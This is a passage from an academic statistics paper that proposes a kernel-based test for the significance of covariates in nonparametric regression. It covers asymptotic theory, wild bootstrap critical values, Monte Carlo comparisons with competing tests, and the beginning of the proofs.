restrictive assumptions. [@Fan1996a], [@FanLi1996] , [@Racine1997], [@ChenFan99], [@Lavergne2000], [@Abs01], and [@Delgado2001] proposed tests of significance for continuous variables in nonparametric regression models. [@Delgado1993], [@DetteN01], [@Lavergne2001], [@NeuD03], [@Racine2006] focused on significance of discrete variables. [@SigQuant13] considered significance testing in nonparametric quantile regression. For each test, one needs first to estimate the model without the covariates under test, that is under the null hypothesis. The result is then used to check the significance of extra covariates. Two competing approaches are then possible. In the “smoothing approach,” one regresses the residuals onto the whole set of covariates nonparametrically, while in the “empirical process approach” one uses the empirical process of residuals marked by a function of all covariates. In this work, we adopt an hybrid approach to develop a new significance test of a subset of covariates in a nonparametric regression. Our new test has three specific features. First, it does not require smoothing with respect to the covariates under test as in the “empirical process approach.” This allows to mitigate the curse of dimensionality that appears with nonparametric smoothing, hence improving the power properties of the test. Our simulation results show that indeed our test is more powerful than competitors under a wide spectrum of alternatives. Second, the test statistic is asymptotically pivotal as in the “smoothing approach,” while wild bootstrap can be used to obtain small samples critical values of the test. This yields a test whose level is well controlled by bootstrapping, as shown in simulations. Third, our test equally applies whether the covariates under test are continuous or discrete, showing that there is no need of a specific tailored procedure for each situation. The paper is organized as follows. In Section 2, we present our testing procedure. In Section 3, we study its asymptotic properties under a sequence of local alternatives and we establish the validity of wild bootstrap. In Section 4, we compare the small sample behavior of our test to some existing procedures. Section 5 gathers our proofs. Testing Framework and Procedure =============================== Testing Principle ----------------- We want to assess the significance of $X\in\mathbb{R}^{q}$ in the nonparametric regression of $Y\in\mathbb{R}$ on $W\in\mathbb{R}^{p}$ and $X$. Formally, this corresponds to the null hypothesis $$H_{0}\,:\,\mathbb{E}\left[Y\mid W,X\right]=\mathbb{E}\left[Y\mid W\right]\quad\mbox{a.s.}$$ which is equivalent to $$H_{0}\,:\, \mathbb{E}\left[u\mid W,X\right]=0\quad\mbox{a.s.} \label{NullHyp}$$ where $u=Y-\mathbb{E}\left[Y\mid W\right]$. The corresponding alternative hypothesis is $$H_{1}\,:\,\Pr\left\{ \mathbb{E}\left[u\mid W,X\right]=0\right\} <1.$$ The following result is the cornerstone of our approach. It characterizes the null hypothesis $H_{0}$ using a suitable unconditional moment equation. \[Fundamental-Lemma\] Let $\left(W_{1},\, X_{1},\, u_{1}\right)$ and $\left(W_{2},\, X_{2},\, u_{2}\right)$ be two independent draws of $\left(W,\, X,\, u\right)$, $\nu(W)$ a strictly positive function on the support of $W$ such that $\mathbb{E}[u^2 \nu^2(W)]<\infty$, and $K(\cdot)$ and $\psi(\cdot)$ even functions with (almost everywhere) positive Fourier integrable transforms. Define $$I\left(h\right)=\mathbb{E}\left[u_{1}u_{2}\nu\left(W_{1}\right) \nu\left(W_{2}\right)h^{-p}K\left(\left(W_{1}-W_{2}\right)/h\right) \psi\left(X_{1}-X_{2}\right)\right] \, .$$ Then for any $h>0$, $$\mathbb{E}\left[u\mid W,X\right]= 0\,\; a.s. \Leftrightarrow I (h) = 0.$$ Let $\langle \cdot, \cdot \rangle$ denote the standard inner product. Using Fourier Inversion Theorem, change of variables, and elementary properties of conditional expectation, $$\begin{aligned} \lefteqn{I\left(h\right)} \\ & = & \mathbb{E}\left[u_{1}u_{2}\nu\left(W_{1}\right)\nu\left(W_{2}\right)\int_{\mathbb{R}^{p}}e^{2\pi i\langle t, \; W_{1}-W_{2}\rangle }\mathcal{F}\left[K\right]\left(th\right)dt \right. \\ & & \times \left. \int_{\mathbb{R}^{q}}e^{2\pi i \langle s ,\;X_{1}-X_{2}\rangle}\mathcal{F}\left[\psi\right]\left(s\right)ds\right]\\ & = & \int_{\mathbb{R}^{q}}\int_{\mathbb{R}^{p}}\left|\mathbb{E}\left[\mathbb{E}\left[u\mid W,X\right]\nu\left(W\right)e^{2\pi i\left\{ \langle t, W \rangle + \langle s, X\rangle \right\} }\right]\right|^{2}\mathcal{F}\left[K\right]\left(th\right)\mathcal{F}\left[\psi\right]\left(s\right)dtds \, .\end{aligned}$$ Since the Fourier transforms $\mathcal{F}\left[K\right]$ and $\mathcal{F}\left[\psi\right]$ are strictly positive, $I(h)=0$ iff $$\mathbb{E}\left[\mathbb{E}\left[u\mid W,X\right]\nu\left(W\right)e^{2\pi i\left\{ \langle t, W \rangle + \langle s, X\rangle \right\} }\right] = 0 \qquad \forall t, s \, .$$ But this is equivalent to $\mathbb{E}\left[u\mid W,X\right]\nu\left(W\right) = 0$ a.s., which by our assumption on $\nu(\cdot)$ is equivalent to $H_{0}$. The Test -------- Lemma \[Fundamental-Lemma\] holds whether the covariates $W$ and $X$ are continuous or discrete. For now, we assume $W$ is continuously distributed, and we later comment on how to modify our procedure in the case where some of its components are discrete. We however do not restrict $X$ to be continuous. Since it is sufficient to test whether $I (h)=0$ for any arbitrary $h$, we can choose $h$ to obtain desirable properties. So we consider a sequence of $h$ decreasing to zero when the sample size increases, which is one of the ingredient that allows to obtain a tractable asymptotic distribution for the test statistic. Assume we have at hand a random sample $(Y_i,W_i,X_i)$, $1\leq i\leq n$, from $(Y,W,X)$. In what follows, $f(\cdot)$ denotes the density of $W$, $r(\cdot)=\mathbb{E}\left[Y\mid W=\cdot\right]$, $u=Y-r(W)$, and $f_{i}$, $r_{i}$, $u_{i}$ respectively denote $f\left(W_{i}\right)$, $r\left(W_{i}\right)$, and $Y_{i}-r\left(W_{i}\right)$. Since nonparametric estimation should be entertained to approximate $u_{i}$, we consider usual kernel estimators based on kernel $L(\cdot)$ and bandwidth $g$. With $L_{nik} = \frac{1}{g^{p}}L\left(\frac{W_{i}-W_{k}}{g} \right)$, let $$\begin{aligned} \hat{f}_{i} & = & (n-1)^{-1}\sum_{k\neq i, k=1}^n L_{nik} \, , \\ \hat{r}_{i} & = & \frac{1}{\hat{f}_{i}} \frac{1}{(n-1)} \sum_{k\neq i, k=1}^n Y_k L_{nik} \, \\ \mbox{so that } \quad \hat{u}_{i} & = & Y_i-\hat{r}_{i}= \frac{1}{\hat{f}_{i}} \frac{1}{(n-1)} \sum_{k\neq i, k=1}^n (Y_i -Y_k) L_{nik} \, .\end{aligned}$$ Denote by $n^{\left(m\right)}$ the number of arrangements of $m$ distinct elements among $n$, and by $[1/n^{\left(m\right)}]\sum_{a}$, the average over these arrangements. In order to avoid random denominators, we choose $\nu\left(W\right)=f\left(W\right)$, which fulfills the assumption of Lemma \[Fundamental-Lemma\]. Then we can estimate $I\left(h\right)$ by the second-order U-statistic $$\begin{aligned} \widehat{I}_{n} & = & \frac{1}{n^{\left(2\right)}}\sum_{a}\hat{u}_{i}\hat{f}_{i}\hat{u}_{j}\hat{f}_{j}K_{nij}\psi_{ij}\\ & = & \frac{1}{n^{\left(2\right)}\left(n-1\right)^{2}}\sum_{a}\sum_{k\neq i}\sum_{l\neq j}\left(Y_{i}-Y_{k}\right)\left(Y_{j}-Y_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij} \, ,\end{aligned}$$ with $K_{nij}=\frac{1}{h^{p}} K\left(\frac{W_{i}-W_{j}}{h}\right)$ and $ \psi_{ij}=\psi\left(X_{i}-X_{j}\right)$. We also consider the alternative statistic $$\tilde{I}_{n}=\frac{1}{n^{\left(4\right)}}\sum_{a} \left(Y_{i}-Y_{k}\right)\left(Y_{j}-Y_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij} \, .$$ It is clear that $\tilde{I}_{n}$ is obtained from $\widehat{I}_{n}$ by removing asymptotically negligible “diagonal” terms. Under the null hypothesis, both statistics will have the same asymptotic normal distribution, but removing diagonal terms reduces the bias of the statistic under $H_{0}$. Our statistics $\tilde{I}_{n}$ and $\widehat{I}_{n}$ are respectively similar to the ones of [@FanLi1996] and [@Lavergne2000], with the fundamental difference that there is no smoothing relative to the covariates $X$. Indeed these authors used a multidimensional smoothing kernel over $(W,X)$, that is $h^{-\left(p+q\right)} \tilde{K}\left(\left(W_{i}-W_{j}\right)/h, \, \left(X_{i}-X_{j}\right)/h\right)$, while we use $K_{nij}\psi_{ij}$. For $I_{n}$ being either $\tilde{I}_{n}$ or $\widehat{I}_{n}$, we will show that $nh^{p/2}I_{n} {\mbox{$\stackrel{d}{\longrightarrow}\,$}}\mathcal{N}\left(0,\omega^{2}\right)$ under $H_{0}$ and $nh^{p/2}I_{n}{\mbox{$\stackrel{p}{\longrightarrow}\,$}}\infty$ under $H_{1}$. By contrast, the statistics of [@FanLi1996] and [@Lavergne2000] exhibit a $nh^{(p+q)/2}$ rate of convergence. The alternative test of [@Delgado2001] uses the kernel residuals $\hat{u}_{i}$ and the empirical process approach of [@Stute1997]. This avoids extra smoothing, but a the cost of a test statistic with a non pivotal asymptotic law under $H_{0}$. Hence, our proposal is an hybrid approach that combines the advantages of existing procedures, namely smoothing only for the variables $W$ appearing under the null hypothesis but with an asymptotic normal distribution for the statistic. Given a consistent estimator $\omega^{2}_{n}$ of $\omega^{2}$, as provided in the next section, we obtain an asymptotic $\alpha$-level test of $H_{0}$ as $$\mbox{Reject } H_{0} \mbox{ if } \ nh^{p/2}I_{n} / \omega_{n} > z_{1-\alpha} \, ,$$ where $z_{1-\alpha}$ is the $(1-\alpha)$-th quantile of the standard normal distribution. In small samples, we will show the validity of a wild bootstrap scheme to obtain critical values. The test applies whether $X$ is continuous or has some discrete components. The procedure is also easily adapted to some discrete components of $W$. In that case, one would replace kernel smoothing by cells’ indicators for the discrete components, so that for $W$ composed of continuous $W_{c}$ of dimension $p_c$ and discrete $W_{d}$, one would use $h^{-p_c} K\left(\frac{W_{ic}-W_{jc}}{h}\right) \ind(W_{id}=W_{jd})$ instead of $ K_{nij}$. It would also be possible to smooth on the discrete components, as proposed by [@RacineLi2004]. To obtain scale invariance, we recommend that observations on covariates should be scaled, say by their sample standard deviation as is customary in nonparametric estimation. It is equally important to scale the $X_{i}$ before they are used as arguments of $\psi(\cdot)$ to preserve such invariance. The outcome of the test may depend on the choice of the kernels $K(\cdot)$ and $L(\cdot)$, while this influence is expected to be limited as it is in nonparametric estimation. The choice of the function $\psi(\cdot)$ might be more important, but our simulations reveal that it is not. From our theoretical study, this function, as well as $K(\cdot)$ should possess an almost everywhere positive and integrable Fourier transform. This is true for (products of) the triangular, normal, Laplace, and logistic densities, see [@JKB], and for a Student density, see [@Hurst]. Alternatively, one can choose $\psi (x)$ as a univariate density applied to some transformation of $x$, such as its norm. This yields $\psi (x) = g \left( \| x\|\right)$ where $g(\cdot)$ is any of the above univariate densities. This is the form we will consider in our simulations to study the influence of $\psi(\cdot)$. Theoretical Properties ====================== We here give the asymptotic properties of our test statistics under $H_{0}$ and some local alternatives. To do so in a compact way, we consider the sequence of hypotheses $$H_{1n}\,:\,\mathbb{E}\left[Y\mid W,X\right]=r\left(W\right)+\delta_{n}d\left(W,X\right),\qquad n\geq 1,$$ where $d(\cdot)$ is a fixed integrable function. Since $r\left(W\right) = \mathbb{E}\left[Y\mid W\right]$, our setup imposes $\mathbb{E}\left[d\left(W,X\right)\mid W\right]=0$. The null hypothesis corresponds to the case $\delta_n\equiv 0$, while considering a sequence $\delta_{n}\to 0$ yields local Pitman-like alternatives. Assumptions ----------- We begin by some useful definitions. \[RegulDef\] [(i)]{} : $\mathcal{U}^{p}$ is the class of integrable uniformly continuous functions from $\mathbb{R}^{p}$ to $\mathbb{R}$; [(ii)]{} : $\mathcal{D}_{s}^{p}$ is the class of $m$-times differentiable functions from $\mathbb{R}^{p}$ to $\mathbb{R}$ , with derivatives of order $\left\lfloor s\right\rfloor $ that are uniformly Lipschitz continuous of order $s-\left\lfloor s\right\rfloor $, where $\left\lfloor s\right\rfloor $ denotes the integer such that $\left\lfloor s\right\rfloor \leq s < \left\lfloor s\right\rfloor +1$. Note that a function belonging to $\mathcal{U}^{p}$ is necessarily bounded. \[KerDef\]$\mathcal{K}_{m}^{p}$, $m\geq2$, is the class of even integrable functions $K\,:\,\mathbb{R}^{p}\to\mathbb{R}$ with compact support satisfying $\int K\left(t\right)dt=1$ and, if $t=(t_1,\dots,t_p)$, $$\int_{\mathbb{R}^{p}} t_{1}^{\alpha_{1}}\dots t_{p}^{\alpha_{p}} K\left(t\right)dt=0\;\; \mbox{ for }\;\; 0<\sum_{i=1}^{p}\alpha_{i}\leq m-1,\,\alpha_{i}\in\mathbb{N}\quad\forall i$$ This definition of higher-order kernels is standard in nonparametric estimation. The compact support assumption is made for simplicity and could be relaxed at the expense of technical conditions on the rate of decrease of the kernels at infinity, see e.g. Definition 1 in [@FanLi1996]. In particular, the gaussian kernel could be allowed for. We are now ready to list our assumptions. \[Sample\] (i) For any $x\in\mathbb{R}^q$ in the support of $X$, the vector $W$ admits a conditional density given $X=x$ with respect to the Lebesgue measure in $\mathbb{R}^p$, denoted by $\pi(\cdot\mid x)$. Moreover, $\mathbb{E}\left[Y^{8}\right]<\infty$. (ii) The observations $\left(W_{i},X_{i},Y_{i}\right)$, $i=1,\cdots, n $ are independent and identically distributed as $(W,X,Y)$. The existence of the conditional density given $X=x$ for all $x\in\mathbb{R}^q$ in the support of $X$ implies that $W$ admits a density with respect to the Lebesgue measure on $\mathbb{R}^p$. As noted above, our results easily generalizes to some discrete components of $W$, but for the sake of simplicity we do not formally consider this in our theoretical analysis. \[RegulHyp\] [(i)]{} : $f\left(\cdot\right)$ and $r\left(\cdot\right)f\left(\cdot\right)$ belong to $\mathcal{U}^{p}\cap\mathcal{D}_{s}^{p}$, $s\geq2$; [(ii)]{} : $\mathbb{E}\left[u^{2}\mid W=\cdot\right]f\left(\cdot\right)$, $\mathbb{E}\left[u^{4}\mid W = \cdot\right]f^{4}\left(\cdot\right)$ belong to $\mathcal{U}^{p};$ [(iii)]{} : the function $\psi\left(\cdot\right)$ is bounded and has a almost everywhere positive and integrable Fourier transform; [(iv)]{} : $K\left(\cdot\right)\in\mathcal{K}_{2}^{p}$ and has an almost everywhere positive and integrable Fourier transform, while $L\left(\cdot\right)\in\mathcal{K}_{\left\lfloor s\right\rfloor}^{p}$ and is of bounded variation; [(v)]{} : let $\sigma^2(w,x)=\mathbb{E}[u^2 \mid W=w,X=x]$, then $\sigma^{2}\left(\cdot,x\right) f^{2}\left(\cdot\right)\pi\left(\cdot\mid x\right)$ belongs to $\mathcal{U}^{p}$ for any $x$ in the support of $X$, has integrable Fourier transform, and $\mathbb{E}\left[\sigma^{4}\left(W,X\right)f^{4}\left(W\right)\pi\left(W\mid X\right)\right]<\infty$; [(vi)]{} : $\mathbb{E}[d^2(W,X)\mid W=\cdot] f^2(\cdot)$ belongs to $\mathcal{U}^{p}$, $d(\cdot , x) f\left(\cdot\right)\pi\left(\cdot\mid x\right)$ is integrable and squared integrable for any $x$ in the support of $X$, and $\mathbb{E}\left[d^{2}\left(W,X\right)f^2\left(W\right)\pi\left(W\mid X\right)\right]<\infty$. Standard regularity conditions are assumed for various functions. A higher-order kernel $L(\cdot)$ is used in conjunction with the differentiability conditions in (i) to ensure that the bias in nonparametric estimation is small enough. Asymptotic Analysis ------------------- The following result characterizes the behavior of our statistics under the null hypothesis and a sequence of local alternatives. \[Consistency\] Let $I_n$ be any of the statistics $\widehat{I}_n$ or $\tilde{I}_n$. Under Assumptions \[Sample\] and \[RegulHyp\], and if as $n\to\infty$ (i) $g,h\to 0$, [ (ii) $n^{7/8} g^{p}/\ln n ,$]{} $nh^{p}\to\infty$, (iii) $nh^{p/2}g^{2s}\to 0$, and (iv) $h/g\to 0$ if $I_n = \tilde{I}_n$ or $h/g^2\to 0$ if $I_n = \widehat{I}_n$, then [(i)]{} : If $\delta_{n}^{2}nh^{p/2}\to C$ with $0\leq C<\infty$, $nh^{p/2}I_{n} {\mbox{$\stackrel{d}{\longrightarrow}\,$}}\mathcal{N}\left(C\mu,\omega^{2}\right)$ where $$\mu=\mathbb{E}\left[\intop\!\! d\left(w,X_{1}\right)d\left(w,X_{2}\right)f^{2}\left(w\right)\pi\left(w\mid X_{1}\right)\pi\left(w\mid X_{2}\right)\psi\left(X_{1}\!-\! X_{2}\right)dw\right]>0$$ $$\begin{aligned} \lefteqn{\mbox{and } \quad \omega^{2} = 2 \int\! K^{2}\!\left(s\right) \, ds} \\ & & \mathbb{E}\left[\int\!\!\sigma^{2}\left(w,X_{1}\right) \sigma^{2}\left(w,X_{2}\right)f^{4}\left(w\right)\pi\left(w\mid X_{1}\right)\pi\left(w\mid X_{2}\right)\psi^{2}\left(X_{1}\!-\! X_{2}\right)dw\right] \, . $$ [(ii)]{} : If $\delta_{n}^{2}nh^{p/2}\to\infty$, $nh^{p/2}I_{n}{\mbox{$\stackrel{p}{\longrightarrow}\,$}}\infty$. The rate of convergence of the test statistic depends only on the dimension of $W$, the covariates present under the null hypothesis, but not on the dimension of $X$, the covariates under test. Similarly, the rate of local alternatives that are detected by the test depends only on the dimension of $W$. As shown in the simulations, this yields some gain in power compared to competing “smoothing” tests. Conditions (i) to (iv) together require that $s>p/2$ for $I_{n}=\tilde{I}_{n}$ and $s>p/4$ for $I_{n}=\widehat{I}_{n}$, so removing diagonal terms in $\widehat{I}_{n}$ allows to weaken the restrictions on the bandwidths. [ Condition (ii) could be slightly weakened to $ng^p \rightarrow \infty$ at the price of handling high order $U$-statistics in the proofs, but allows for a shorter argument based on empirical processes, see Lemma \[unif\_omeg\] in the proofs section.]{} To estimate $\omega^{2}$, we can either mimic [@Lavergne2000] to consider $$\tilde{\omega}_{n}^{2}=\dfrac{2h^{p}}{n^{\left(6\right)}}\sum_{a} \left(Y_{i}-Y_{k}\right)\left(Y_{i}-Y_{k^{\prime}}\right)\left(Y_{j}-Y_{l}\right) \left(Y_{j}-Y_{l^{\prime}}\right)L_{nik}L_{nik^{\prime}}L_{njl}L_{njl^{\prime}}K_{nij}^{2}\psi_{ij}^{2},$$ or generalize the variance estimator of [@FanLi1996] as $$\widehat{\omega}_{n}^{2}=\dfrac{2h^{p}}{n^{\left(2\right)}}\sum_{a} \hat{u}_{i}^{2}\hat{f}_{i}^{2}\hat{u}_{j}^{2}\hat{f}_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}.$$ The first one is consistent for $\omega^{2}$ under both the null and alternative hypothesis, but the latter is faster to compute. \[corr\_test\_o\] Let $I_n$ be any of the statistics $\widehat{I}_n$ or $\tilde{I}_n$ and let $\omega_{n}$ denote any of $\widehat{\omega}_{n}$ or $\tilde{\omega}_{n}$. Under the assumptions of Theorem \[Consistency\], the test that rejects $H_{0}$ when $nh^{p/2}I_{n}/\omega_{n} > z_{1-\alpha}$ is of asymptotic level $\alpha$ under $H_{0}$ and is consistent under the sequence of local alternatives $H_{1n}$ provided $\delta_{n}^{2}nh^{p/2}\to\infty$. Bootstrap Critical Values ------------------------- It is known that asymptotic theory may be inaccurate for small and moderate samples when using smoothing methods. Hence, as in e.g. [@Hardle1993] or [@Delgado2001], we consider a wild bootstrap procedure to approximate the quantiles of our test statistic. Resamples are obtained from $Y_{i}^{*}=\hat{r}_{i}+u_{i}^{*}$, where $u_{i}^{*}=\eta_{i}\hat{u}_{i}$ and $\eta_{i}$ are i.i.d. variables independent of the initial sample with $\mathbb{E}\eta_{i}=0$ and $\mathbb{E}\eta_{i}^{2}=\mathbb{E}\eta_{i}^{3}=1$, $1\leq i\leq n$. The $\eta_i$ could for instance follow the two-point law of [@Mammen1993]. With at hand a bootstrap sample $(Y_{i}^{*},W_i,X_i)$, $1\leq i\leq n$, we obtain a bootstrapped statistic $I_{n}^{*}$ with bootstrapped observations $Y_{i}^{*}$ in place of original observations $Y_{i}$. When the scheme is repeated many times, the bootstrap critical value $z^\star_{1-\alpha, n}$ at level $\alpha$ is the empirical $(1-\alpha)$-th quantile of the bootstrapped test statistics. The asymptotic validity of this bootstrap procedure is guaranteed by the following result. \[Bootstrap Consistency\] Suppose Assumptions \[Sample\], \[RegulHyp\], and Conditions (i) to (iii) of Theorem \[Consistency\] hold. Moreover, assume $\inf_{w\in\mathcal{S}_{W}}f\left(w\right)>0$ and $h/g^{2}\to 0$. Then for $I_{n}^{*}$ equal to any of $\widehat{I}_{n}^{*}$ and $\tilde{I}_{n}^{*}$, $$\sup_{z\in\mathbb{R}}\left|\mathbb{P}\left[nh^{p/2}I_{n}^{*}/\omega_{n}^{*}\leq z\mid Y_1,W_{1}, X_{1},\cdots, Y_n, W_{n}, X_{n}\right]-\Phi\left(z\right)\right| {\mbox{$\stackrel{p}{\longrightarrow}\,$}}0 \, ,$$ where $\Phi\left(\cdot\right)$ is the standard normal distribution function. Monte Carlo Study ================= We investigated the small sample behavior of our test and studied its performances relative to alternative tests. We generated data through $$Y=\left(W'\theta\right)^{3} - W'\theta+ \delta d\left(X\right) + \varepsilon$$ where $W$ follow a two-dimensional standard normal, $X$ independently follows a $q$-variate standard normal, $\varepsilon\sim \mathcal{N}\left(0, 4\right)$, and we set $\theta=\left(1,\,-1\right)^{\prime}/\sqrt{2}$. The null hypothesis corresponds to $\delta = 0$, and we considered various forms for $d(\cdot)$ to investigate power. We only considered the test based on $\tilde{I}_n$, labelled LMP, as preliminary simulation results showed that it had similar or better performances than the test based on $\widehat{I}_n$. We compared it to the test of Lavergne and Vuong (2000, hereafter LV), and the test of Delgado and Gonzalez-Manteiga (2001, hereafter DGM). The statistic for the latter test is the Cramer-von-Mises statistic $$\sum_{i=1}^{n} \left[ \sum_{j=1}^{n}{ \widehat{u}_{j}} \widehat{f}_{j} \,\mathbf{1}\left\{W_j \leq W_{i}\right\} \,\mathbf{1}\left\{X_j \leq X_{i}\right\} \right]^{2} \, ,$$ and critical values are obtained by wild bootstrapping as for our own statistic. To compute bootstrap critical values, we used 199 bootstrap replications and the two-point distribution $$\Pr \left( \eta_{i} = \frac{1-\sqrt{5}}{2} \right) = \frac{5+\sqrt{5}}{10} \; , \; \Pr \left( \eta_{i} = \frac{1+\sqrt{5}}{2} \right) = \frac{5-\sqrt{5}}{10} \; .$$ For all tests, each time a kernel appears, we used the Epanechnikov kernel applied to the norm of its argument $u$, that is $0.75\,\left(1-\left\Vert u\right\Vert^2\right)\mathbf{1}\left\{ \left\Vert u\right\Vert <1\right\}$. The bandwidth parameters are set to $g=n^{-1/6}$ and $h=c \, n^{-2.1/6}$, and we let $c$ vary to investigate the sensitivity of our results to the smoothing parameter’s choice. To study the influence of $\psi(\cdot)$ on our test, we considered $\psi(x) = l\left(\left\Vert x\right\Vert \right)$, where $l(\cdot)$ is a triangular or normal density, each with a second moment equal to one. Figure \[fig:LevelCont\] reports the empirical level of the various tests for $n=100$ based on 5000 replications when we let $c$ and $q$ vary. For our test, bootstrapping yields more accurate rejection levels than the asymptotic normal critical values for any bandwidth factor $c$ and dimension $q$. The choice of $\psi(\cdot)$ does not influence the results. The empirical level of LV test is much more sensitive to the bandwidth and the dimension. The empirical level of the DGM test is close to the nominal one for a low dimension $q$, but decreases with increasing $q$. To investigate power, we considered different forms of alternatives as specified by $d(\cdot)$. We first focus on a quadratic alternative, where $d\left(X\right)= \left(X'\beta-1\right)^{2}/\sqrt{2}$, with $\beta=\left(1,\,,1,\,,\dots\right)^{\prime}/\sqrt{q}$. Figure \[fig:PowerContQs\] reports power curves of the different tests for the quadratic alternative, $n=100$, and a nominal level of 10% based on $2000$ replications. We also report the power of a Fisher test based on a linear specification in the components of $X$. The power of our test, as well as the one of LV test, increases when the bandwidth factor $c$ increases. This is in line with theoretical findings, though we may expect this relationship to revert for very large bandwidths. Our test always dominates LV test, as well as the Fisher test and DGM test, for any choice of $c$ and any dimension $q$. The power of all tests decreases when the dimension $q$ increases, but the more notable degradation is for the DGM test. In Figure \[fig:PowerContNs\], we let $n$ vary for a fixed dimension $q=5$. The power of all tests improve, but our main qualitative findings are not affected. It is noteworthy that the power advantage of our test compared to LV test become more pronounced as $n$ increases. In Figure \[fig:PowerContAlter\], we considered a linear alternative $d\left(X\right)=X'\beta$ and a sine alternative, $d\left(X\right)= \sin\left(2 \, X'\beta\right)$. Our main findings remain unchanged. For a linear alternative, the Fisher test is most powerful as expected. Compared to this benchmark, the loss of power when using our test is moderate for a large enough bandwidth factors $c$. For a sine alternative, our test is more powerful than the Fisher test for $c=2$ or 4. We also considered the case of a discrete $X$. We generated data following $$Y=\left(W'\theta\right)^{3} - W'\theta+ \delta d\left(W\right) \,\mathbf{1}\left\{X=1\right\} + \varepsilon$$ where $W$ and $\varepsilon$ are generated as before, and $X$ is Bernoulli with probability of success $p=0.6$. We compared our test to two competitors. The test proposed by Lavergne (2001) is similar to our test with the main difference that $\psi(\cdot)$ is the indicator function, i.e. $\psi\left( X_i - X_j\right) = \mathbf{1}\left\{X_i=X_j\right\}$. The test of Neumeyer et Dette (2003, hereafter ND) is similar in spirit to the DGM test. The details of the simulations are similar to above. Figures \[fig:LevelDisc\] and \[fig:PowerDisc\] report our results. Bootstrapping our test and Lavergne’s test yield accurate rejection levels, while the asymptotic tests and the ND test underrejects. Under a quadratic alternative, the power of our test is comparable to the one of the ND test for a large enough bandwidth factor $c$. Under a sine alternative, our test outperforms ND test in all cases. Conclusion ========== We have developed a testing procedure for the significance of covariates in a nonparametric regression. Smoothing is entertained only for the covariates under the null hypothesis. The resulting test statistic is asymptotically pivotal, and wild bootstrap can be used to obtain critical values in small and moderate samples. The test is versatile, as it applies whether the covariates under test are continuous and/or discrete. Simulations reveal that our test outperforms its competitors in many situations, and especially when the dimension of covariates is large. Proofs ====== We here provide the proofs of the main results. Technical lemmas are relegated to the Appendix. In the following, for any integrable function $\delta(X),$ let $\mathcal{F}_{X}\left[\delta\right]\left(u\right)=\mathbb{E}[e^{ -2\pi i\langle X, \;u\rangle} \delta\left(X\right)],$ $u\in\mathbb{R}^q.$ Moreover, for any index set $I$ not containing $i$ with cardinality $\left|I\right|$, define $$\widehat{f_{i}^{I}}=\left(n-\left|I\right|-1\right)^{-1}\sum_{k\neq i,k\notin I}L_{nik},$$ consistent with $\widehat{f_{i}}$ that corresponds to the case where $I$ is the empty set. Proof of Theorem \[Consistency\] -------------------------------- We first consider the case $I_n=\tilde{I}_{n}$. Next, we study the difference between $\tilde{I}_{n}$ and $\widehat{I}_{n}$ and hence deduce the result for $I_n=\widehat{I}_{n}$. #### Case $I_n=\tilde{I}_{n}$. Consider the decomposition $$\begin{aligned} I_{n} & = & \frac{1}{n^{\left(4\right)}}\sum_{a}\left(u_{i}-u_{k}\right)\left(u_{j}-u_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\frac{2}{n^{\left(4\right)}}\sum_{a}\left(u_{i}-u_{k}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\frac{1}{n^{\left(4\right)}}\sum_{a}\left(r_{i}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{1}+2I_{2}+I_{3},\end{aligned}$$ where $$\begin{aligned} I_{1} & = & \frac{n-2}{n-3}\frac{1}{n^{(2)}}\sum_{a}u_{i}u_{j}f_{i}f_{j}K_{nij}\psi_{ij}+\frac{2\left(n-2\right)}{n-3}\frac{1}{n^{\left(2\right)}}\sum_{a}u_{i}\left(\widehat{f}_{i}^{j}-f_{i}\right)u_{j}f_{j}K_{nij}\psi_{ij}\\ & & +\frac{n-2}{n-3}\frac{1}{n^{(2)}}\sum_{a}u_{i}\left(\widehat{f}_{i}^{j}-f_{i}\right)u_{j}\left(\widehat{f}_{j}^{i}-f_{j}\right)K_{nij}\psi_{ij}-\frac{2}{n^{(3)}}\sum_{a}u_{i}f_{i}u_{l}L_{njl}K_{nij}\psi_{ij}\\ & & -\frac{2}{n^{\left(3\right)}}\sum_{a}u_{i}\left(\widehat{f}_{i}^{j,l}-f_{i}\right)u_{l}L_{njl}K_{nij}\psi_{ij}+\frac{1}{n^{\left(4\right)}}\sum_{a}u_{k}u_{l}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\frac{1}{n^{\left(4\right)}}\sum_{a}u_{i}u_{j}L_{nik}L_{njk}K_{nij}\psi_{ij}\\ & = & \frac{n-2}{n-3}\left[I_{0n}+2I_{1,1}+I_{1,2}\right]-2I_{1,3}-2I_{1,4}+I_{1,5}-I_{1,6},\end{aligned}$$ and $$\begin{aligned} I_{2} & = & \frac{1}{n^{\left(3\right)}}\sum_{a}u_{i}f_{i}\left(r_{j}-r_{l}\right)L_{njl}K_{nij}\psi_{ij}+\frac{1}{n^{\left(3\right)}}\sum_{a}u_{i}\left(\widehat{f}_{i}^{j,l}-f_{i}\right)\left(r_{j}-r_{l}\right)L_{njl}K_{nij}\psi_{ij}\\ & & -\frac{1}{n^{\left(4\right)}}\sum_{a}u_{k}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}=I_{2,1}+I_{2,2}-I_{2,3}.\end{aligned}$$ In Proposition \[Normality\] we prove that, under $H_{0},$ $I_{0n}$ is asymptotically centered Gaussian with variance $\omega^{2}$, while in Proposition \[NormalityH1\] we prove that, under $H_{1n},$ $I_{0n}$ is asymptotically Gaussian with mean $\mu$ and variance $\omega^{2}$ provided $\delta_{n}^{2}nh^{p/2}$ converges to some positive real number. In Propositions \[Ustat\] and \[Remaining\] we show that all remaining terms in the decomposition of $I_n$ are asymptotically negligible. \[Normality\]Under the conditions of Theorem \[Consistency\], $nh^{p/2}I_{0n} {\mbox{$\stackrel{d}{\longrightarrow}\,$}}\mathcal{N}\left(0,\omega^{2}\right)$ under $H_{0}$. Let us define the martingale array $\left\{ S_{n,m},\mathcal{F}_{n,m},\,1\leq m\leq n,\, n\geq1\right\} $ where $S_{n,1}=0,$ and $$S_{n,m}=\sum_{i=1}^{m}G_{n,i} \;\;\; \text{ with } \; \;\; G_{n,i}=\dfrac{2h^{p/2}}{n-1}u_{i}f_{i}\sum_{j=1}^{i-1}u_{j}f_{j}K_{nij}\psi_{ij}, \qquad 2\leq i, m 